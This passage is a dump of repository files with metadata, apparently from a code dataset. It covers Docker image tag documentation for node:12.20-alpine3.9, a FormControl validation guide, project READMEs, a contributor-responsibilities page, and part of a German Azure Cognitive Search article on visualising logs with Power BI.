/usr/local/bin/ # Tue, 05 Jan 2021 19:21:23 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 05 Jan 2021 19:21:24 GMT CMD ["node"] ``` - Layers: - `sha256:ca413bedb4ea5c78f6e0893c7e6abe204eaa1a07d3fb0505e96e0c8d526108f7` Last Modified: Thu, 23 Apr 2020 22:05:29 GMT Size: 2.4 MB (2355563 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:f5db4343eacc03639e3f1a49da466dfd24353ae76ff305b4bbb495339b1a80c9` Last Modified: Tue, 05 Jan 2021 20:01:24 GMT Size: 23.5 MB (23536273 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:f4011f2092223fb7e4580efd9b7a4fc91d43647f92c267c4c5d43d96d3161002` Last Modified: Tue, 05 Jan 2021 20:01:16 GMT Size: 2.3 MB (2290323 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:c4f9b58e5f2ca45c9018dcf8d05f1715aa9cd066ba52f3ea336e6d36824502df` Last Modified: Tue, 05 Jan 2021 20:01:15 GMT Size: 278.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `node:12.20-alpine3.9` - linux; arm64 variant v8 ```console $ docker pull node@sha256:00da43dd4659a3f9b2ec498af82a236dff8319e8d737a5c0b6af8963f5e9377b ``` - Docker Version: 19.03.12 - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **29.8 MB (29830471 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:0e329a999a6540644860c5d85eee3556ba2da331e38ad6f65194c18cc2c9038f` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["node"]` ```dockerfile # Fri, 24 Apr 2020 00:15:12 GMT ADD file:da3ddeca2212f561c1f428b662a1f1f1200e2d18a42bffb28a0322c235f06582 in / # Fri, 24 Apr 2020 00:15:15 GMT CMD ["/bin/sh"] # Tue, 05 Jan 2021 19:03:20 GMT ENV NODE_VERSION=12.20.1 # Tue, 05 Jan 2021 19:14:35 GMT RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="783fbfc85228418d0630b778214bdcea3a82d5c3ac13aefcc14e4a81e977d9c9" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python2 && for key in 4ED778F539E3634C779C87C6D7062848A1AB005C 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 1C050899334244A8AF75E53792EF661D867B9DFA 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C DD8F2338BAE7501E3DD5AC78C273792F7D83545D A48C2BEE680E841632CD4E44F07496B3EB3C1762 108F52B48DB57BB0CC439B2997B01419BD92F80A B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version # Tue, 05 Jan 2021 19:14:37 GMT ENV YARN_VERSION=1.22.5 # Tue, 05 Jan 2021 19:14:43 GMT RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version # Tue, 05 Jan 2021 19:14:44 GMT COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/ # Tue, 05 Jan 2021 19:14:45 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 05 Jan 2021 19:14:45 GMT CMD ["node"] ``` - Layers: - `sha256:941f399634ec37b35e6764d0e6cf350593652f06f76586d45ddfc0d77de7a701` Last Modified: Fri, 24 Apr 2020 00:16:02 GMT Size: 2.7 MB (2694467 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:2d1285a7dab0d00cac8721872eed654b4ca462461840bb40017a799f9a594682` Last Modified: Tue, 05 Jan 2021 19:58:04 GMT Size: 24.8 MB (24836368 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:5d075c5a0c431db4ca4fc7e7103b25356258d4f489e1323e018d22edaf907430` Last Modified: Tue, 05 Jan 2021 19:57:57 GMT Size: 2.3 MB (2299355 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:acefd92ffd4fbf21324fd1b4ae6ca5a44c80341b0c9bfbe8719d6df411fe24fb` Last Modified: Tue, 05 Jan 2021 19:57:57 GMT Size: 281.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `node:12.20-alpine3.9` - linux; ppc64le ```console $ docker pull node@sha256:ee291daa6b4eaad3f02335717cb55c5fc14c077dac81f39904e0b314eed551e4 ``` - Docker Version: 19.03.12 - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **32.1 MB (32118042 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:bb29a75752dbdf309149fd53ac19506c4b18b5dc34c86130343cc77c172abae1` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["node"]` ```dockerfile # Thu, 23 Apr 2020 20:41:14 GMT ADD file:2eaa074d9379f98d31cc4112997e1c1bb55b3871574af6aee576cf1c5ed99645 in / # Thu, 23 Apr 2020 20:41:16 GMT CMD ["/bin/sh"] # Tue, 05 Jan 2021 20:52:40 GMT ENV NODE_VERSION=12.20.1 # Tue, 05 Jan 2021 21:09:04 GMT RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="783fbfc85228418d0630b778214bdcea3a82d5c3ac13aefcc14e4a81e977d9c9" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python2 && for key in 4ED778F539E3634C779C87C6D7062848A1AB005C 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 1C050899334244A8AF75E53792EF661D867B9DFA 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C DD8F2338BAE7501E3DD5AC78C273792F7D83545D A48C2BEE680E841632CD4E44F07496B3EB3C1762 108F52B48DB57BB0CC439B2997B01419BD92F80A B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version # Tue, 05 Jan 2021 21:09:13 GMT ENV YARN_VERSION=1.22.5 # Tue, 05 Jan 2021 21:09:30 GMT RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version # Tue, 05 Jan 2021 21:09:34 GMT COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/ # Tue, 05 Jan 2021 21:09:39 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 05 Jan 2021 21:09:47 GMT CMD ["node"] ``` - Layers: - `sha256:16f2eaeeecc1446c304d41ae21441f168e376dc76733ec3a9f8f2d17119638a1` Last Modified: Thu, 23 Apr 2020 20:41:57 GMT Size: 2.8 MB (2787865 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:e67e85c6fa2cf1d35579c1f08fc0d9ddf862ca61b3018b844c0c1289601df486` Last Modified: Tue, 05 Jan 2021 22:35:07 GMT Size: 27.0 MB (27030639 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:7693b75b0be3a96a05ab4d008b83d4b7029b45e36e2adb155a6a3afa6ee2ce84` Last Modified: Tue, 05 Jan 2021 22:34:30 GMT Size: 2.3 MB (2299256 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:f0aaab9b4e3f2d552d263a15f8da9418cf9c5ef70bd16fda2c2d3fe7727da802` Last Modified: Tue, 05 Jan 2021 22:34:29 GMT Size: 282.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `node:12.20-alpine3.9` - linux; s390x ```console $ docker pull node@sha256:593b543927de5654483e448f770c5c1dffaeffc5d63aa8404a2c107ef6692326 ``` - Docker Version: 19.03.12 - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **29.6 MB (29598731 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:c42b0e5f2fd972abf9f1d851a49f8e0ace1eed90b41144ecedb8f1c1bf124f7e` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["node"]` ```dockerfile # Thu, 23 Apr 2020 17:51:19 GMT ADD file:87357838aa76ab358b68ac6734871df2dacb0b5918d89a091836f0d33264f803 in / # Thu, 23 Apr 2020 17:51:20 GMT CMD ["/bin/sh"] # Tue, 05 Jan 2021 20:42:00 GMT ENV NODE_VERSION=12.20.1 # Tue, 05 Jan 2021 21:00:29 GMT RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="783fbfc85228418d0630b778214bdcea3a82d5c3ac13aefcc14e4a81e977d9c9" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python2 && for key in 4ED778F539E3634C779C87C6D7062848A1AB005C 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 1C050899334244A8AF75E53792EF661D867B9DFA 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C DD8F2338BAE7501E3DD5AC78C273792F7D83545D A48C2BEE680E841632CD4E44F07496B3EB3C1762 108F52B48DB57BB0CC439B2997B01419BD92F80A B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version # Tue, 05 Jan 2021 21:00:34 GMT ENV YARN_VERSION=1.22.5 # Tue, 05 Jan 2021 21:00:39 GMT RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version # Tue, 05 Jan 2021 21:00:40 GMT COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/ # Tue, 05 Jan 2021 21:00:40 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 05 Jan 2021 21:00:41 GMT CMD ["node"] ``` - Layers: - `sha256:1aff3887737eb15ee1a53e92e8c87162b9caac2281ecb01242da00d1a32f5a04` Last Modified: Thu, 23 Apr 2020 17:51:52 GMT Size: 2.6 MB (2550329 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:dda4d4006ee92d40f99a94689d6512c62490ac5b0182457fea168b231d44cebe` Last Modified: Tue, 05 Jan 2021 21:59:59 GMT Size: 24.7 MB (24746435 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:0a23d2ffa53c938fb8ceb348635139e4299def623f6e49c3c6b89d67e1e7c7bb` Last Modified: Tue, 05 Jan 2021 21:59:54 GMT Size: 2.3 MB (2301686 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:9e9fa7834445f6075e30738259fb044f8d4c82d9a6c66ab6220e952eb7d634b5` Last Modified: Tue, 05 Jan 2021 21:59:54 GMT Size: 281.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
102.822823
2,677
0.697605
yue_Hant
0.353304
6f620afaca54f4dc3e87a1dbd1b7158b9e79e43d
2,139
md
Markdown
docs/guide/form-control.md
websublime/forms
afadad698ca3b64ee4c221ef4e34ff8ef4fdec78
[ "MIT" ]
null
null
null
docs/guide/form-control.md
websublime/forms
afadad698ca3b64ee4c221ef4e34ff8ef4fdec78
[ "MIT" ]
1
2022-03-04T00:41:28.000Z
2022-03-04T00:41:28.000Z
docs/guide/form-control.md
websublime/forms
afadad698ca3b64ee4c221ef4e34ff8ef4fdec78
[ "MIT" ]
null
null
null
# FormControl FormControl is used to map properties in an object model. Most of the UI components will be linked to this control. ## Validation To create any form object model, we need first to create a validation schema. The follwing code create a validation schema for a property that must be of type `number`, is `required` and the `max` value is `10` ```typescript const schema = NumberType() .isRequired() .max(10); ``` Then we can create a FormControl for this validation schema. ```typescript const control = new FormControl(schema); control.setData(11); // does not trigger a validation expect(control.isValid).toBeTruthy(); expect(control.hasErrors).toBeFalsy(); await control.validate(); expect(control.isValid).toBeFalsy(); expect(control.hasErrors).toBeTruthy(); console.log(control.errors[0].i18n); // ERRORS.NUMBER.MAX console.log(control.errors[0].constraints); // { max: 10 } console.log(control.errors[0].value); // 11 ``` ::: info Note Setting a value do not trigger the validation ::: ## Change state The following code show that setting data to be validated or executing validation do not change the control state for `isDirty`, `isPrestine` or `isTouch` We have methods to form the change of these states: - **setDirty** - **setFocus** - **setTouch** :::info Note If the control has a parent (belong to a `FormGroup` or `FormArray`) the state will be propagated until the root. ::: ```typescript const schema = NumberType() .isRequired() .max(10); const control = new FormControl(schema); control.setData(11); // do not change control state expect(control.isDirty).toBeFalsy(); expect(control.isPrestine).toBeTruthy(); expect(control.isTouch).toBeFalsy(); expect(control.isValid).toBeTruthy(); await control.validate(); // only change isValid expect(control.isDirty).toBeFalsy(); expect(control.isPrestine).toBeTruthy(); expect(control.isTouch).toBeFalsy(); expect(control.isValid).toBeFalsy(); // Changed control.setDirty(); expect(control.isDirty).toBeTruthy(); expect(control.isPrestine).toBeFalsy(); expect(control.isTouch).toBeTruthy(); expect(control.isValid).toBeFalsy(); ```
25.164706
154
0.743338
eng_Latn
0.802311
6f62380de7bac02a75228a08f62abbc5677ef449
423
md
Markdown
README.md
ricardoshaffer/portfolio
75b0673585623c4ad1b97b08dc915f5a5dcb3bfd
[ "MIT" ]
1
2020-06-30T16:41:43.000Z
2020-06-30T16:41:43.000Z
README.md
ricardoshaffer/portfolio
75b0673585623c4ad1b97b08dc915f5a5dcb3bfd
[ "MIT" ]
null
null
null
README.md
ricardoshaffer/portfolio
75b0673585623c4ad1b97b08dc915f5a5dcb3bfd
[ "MIT" ]
null
null
null
# Personal portfolio Personal Full-Stack Development Portfolio for Ricardo Shaffer. ## Deployed at: * RicardoShaffer.com via GitHub. ## Developed Using: * HTML, CSS, and JS. ## Credits * Graphics created using Adobe Illustrator, Adobe Animate. * Framework by **Bootstrap** * certain SVG icons by **Fontawesome** ## License * MIT License. (C) 2020, Ricardo Shaffer. All other items are owned by their respective owners.
24.882353
95
0.747045
eng_Latn
0.907763
6f623e32e92de2f660d88c41e2a22cf4d8f47e69
826
md
Markdown
_pages/section_seven_two.md
devinpowers/devintheengineer.com
a0bdb708730b027bdca060cae0cb0dadbb6d491d
[ "MIT" ]
null
null
null
_pages/section_seven_two.md
devinpowers/devintheengineer.com
a0bdb708730b027bdca060cae0cb0dadbb6d491d
[ "MIT" ]
1
2020-10-18T12:15:10.000Z
2020-10-18T12:15:10.000Z
_pages/section_seven_two.md
devinpowers/devinpowers.github.io
46cf0d90bf41542e57ed9bcffd821dd233d369fc
[ "MIT" ]
null
null
null
--- layout: archive permalink: /discretemathematics/chapter_seven/section_seven_two title: "7.2 Probability Theory" author_profile: true header: image: "/images/chicagotwo.jpeg" --- ![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page1.jpg) ![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page2.jpg) ![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page3.jpg) ![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page4.jpg) ![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page5.jpg) ![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page6.jpg) ![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page7.jpg) ![inserting an Image](/images/Discrete_Math/Chapter_Seven/Section7.2/Page8.jpg)
43.473684
79
0.803874
yue_Hant
0.868773
6f62e92f60298c716f595c565d3db7737e138551
665
md
Markdown
README.md
malorisdead/QRChrome
eb36bd96e2af606a26640a072778849d7b43eb61
[ "MIT" ]
null
null
null
README.md
malorisdead/QRChrome
eb36bd96e2af606a26640a072778849d7b43eb61
[ "MIT" ]
null
null
null
README.md
malorisdead/QRChrome
eb36bd96e2af606a26640a072778849d7b43eb61
[ "MIT" ]
null
null
null
# QRChrome QRChrome is a very basic Chrome extension that generates QR codes from selected text, link and media URLs, and page URLs. It runs entirely in the browser with no calls to external APIs. ## QRCode.js This extension is basically a thin wrapper around [QRCode.js](https://github.com/davidshimjs/qrcodejs) by davidshimjs. It's super-fast and cross-browser compatible. ## Icons QRChrome uses icons by [FatCow](http://www.fatcow.com/free-icons), licensed under the [Creative Commons Attribution 3.0 license](http://creativecommons.org/licenses/by/3.0/us/). ## License This extension is licensed under the [MIT license](http://opensource.org/licenses/MIT).
60.454545
186
0.77594
eng_Latn
0.962078
6f6321cb4d8068813db05aaf75e0a768ed45f988
1,332
md
Markdown
dev-handbook/responsibilities-expectations.md
caius/fullstaq-ruby-server-edition
662e43d22fe78f7c917c73f903c9ebe5a64438b7
[ "MIT" ]
537
2019-06-14T19:33:33.000Z
2022-03-27T08:48:25.000Z
dev-handbook/responsibilities-expectations.md
caius/fullstaq-ruby-server-edition
662e43d22fe78f7c917c73f903c9ebe5a64438b7
[ "MIT" ]
79
2019-06-19T19:24:38.000Z
2022-02-26T15:20:15.000Z
dev-handbook/responsibilities-expectations.md
caius/fullstaq-ruby-server-edition
662e43d22fe78f7c917c73f903c9ebe5a64438b7
[ "MIT" ]
31
2019-06-20T09:18:35.000Z
2022-03-06T20:11:38.000Z
# Responsibilities & expectations Joining the team means assuming one or more of the following responsibilities: * Investigating and fixing urgent issues and down time. * Ensuring that packages are kept up-to-date with upstream versions. * Ensuring that new distribution versions are supported. * Reviewing Server Edition pull requests. * Ensuring that community interactions follow our [Code of Conduct](../CODE_OF_CONDUCT.md). * Providing [mentorship](mentorship.md) to contributors and fellow team members. <!-- NOTE: please keep this list in sync with .github/ISSUE_TEMPLATE/apply_join_team.md --> You do not need to be an expert on all the areas that we deal with. It's fine if your skills on one or more areas is entry-level, as long as you are curious and want to learn. That's why team members mentor each other. You don't need to assume all responsibilities at once, nor do you need to be available at all times. You are free to decide how much time you are willing to invest as a team member, and you are free to leave whenever you want. Our goal is to build a resilient team by having many members cover for each other, even if they individually only have limited time resources. But at the very least, we expect that you are responsive for contact, and that you are at least occasionally available to help.
63.428571
226
0.783033
eng_Latn
0.99992
6f64157113fcea0a284483480c8350f56eb60f1d
9,087
md
Markdown
articles/search/search-monitor-logs-powerbi.md
NikoMix/azure-docs.de-de
357aca84dfe4bb69cc9c376d62d7b4c81da38b42
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/search/search-monitor-logs-powerbi.md
NikoMix/azure-docs.de-de
357aca84dfe4bb69cc9c376d62d7b4c81da38b42
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/search/search-monitor-logs-powerbi.md
NikoMix/azure-docs.de-de
357aca84dfe4bb69cc9c376d62d7b4c81da38b42
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Visualisieren von Azure Cognitive Search-Protokollen und -Metriken mit Power BI description: Visualisieren von Azure Cognitive Search-Protokollen und -Metriken mit Power BI manager: eladz author: MarkHeff ms.author: maheff ms.service: cognitive-search ms.topic: conceptual ms.date: 09/25/2020 ms.openlocfilehash: 4056e892855c06ce6c412ec4a592ebcd97fc11a6 ms.sourcegitcommit: 4295037553d1e407edeb719a3699f0567ebf4293 ms.translationtype: HT ms.contentlocale: de-DE ms.lasthandoff: 11/30/2020 ms.locfileid: "96325382" --- # <a name="visualize-azure-cognitive-search-logs-and-metrics-with-power-bi"></a>Visualisieren von Azure Cognitive Search-Protokollen und -Metriken mit Power BI Mit [Azure Cognitive Search](./search-what-is-azure-search.md) können Sie Vorgangsprotokolle und Dienstmetriken zu Ihrem Suchdienst in einem Azure Storage-Konto speichern. Diese Seite enthält Anweisungen dazu, wie Sie diese Informationen über eine Power BI-Vorlagen-App visualisieren können. Die App bietet detaillierte Einblicke in ihren Suchdienst, einschließlich Informationen zu Suchen, Indizierung, Vorgängen und Dienstmetriken. Sie finden die Power BI-Vorlagen-App **Azure Cognitive Search: Analyze Logs and Metrics** im [Power BI-Apps-Marketplace](https://appsource.microsoft.com/marketplace/apps). ## <a name="how-to-get-started-with-the-app"></a>Erste Schritte mit der App 1. Aktivieren Sie Metriken und Ressourcenprotokollierung für Ihren Suchdienst: 1. Erstellen oder identifizieren Sie ein vorhandenes [Azure Storage-Konto](../storage/common/storage-account-create.md), in dem Sie die Protokolle archivieren können. 1. Navigieren Sie im Azure-Portal zu Ihrem Azure Cognitive Search-Dienst. 1. Wählen Sie in der linken Spalte im Abschnitt „Überwachung“ die Option **Diagnoseeinstellungen** aus. :::image type="content" source="media/search-monitor-logs-powerbi/diagnostic-settings.png" alt-text="Screenshot, der zeigt, wie die Diagnoseeinstellungen im Abschnitt „Überwachung“ des Azure Cognitive Search-Diensts ausgewählt werden." border="false"::: 1. Wählen Sie **+ Diagnoseeinstellung hinzufügen** aus. 1. Aktivieren Sie **In einem Speicherkonto archivieren**, geben Sie Ihre Speicherkontoinformationen an, und aktivieren Sie **OperationLogs** und **AllMetrics**. :::image type="content" source="media/search-monitor-logs-powerbi/add-diagnostic-setting.png" alt-text="Screenshot zur Auswahl von Metriken und Ressourcenprotokollierung auf der Seite mit den Diagnoseeinstellungen."::: 1. Wählen Sie **Speichern** aus. 1. Verwenden Sie nach dem Aktivieren der Protokollierung ihren Suchdienst, um mit dem Generieren von 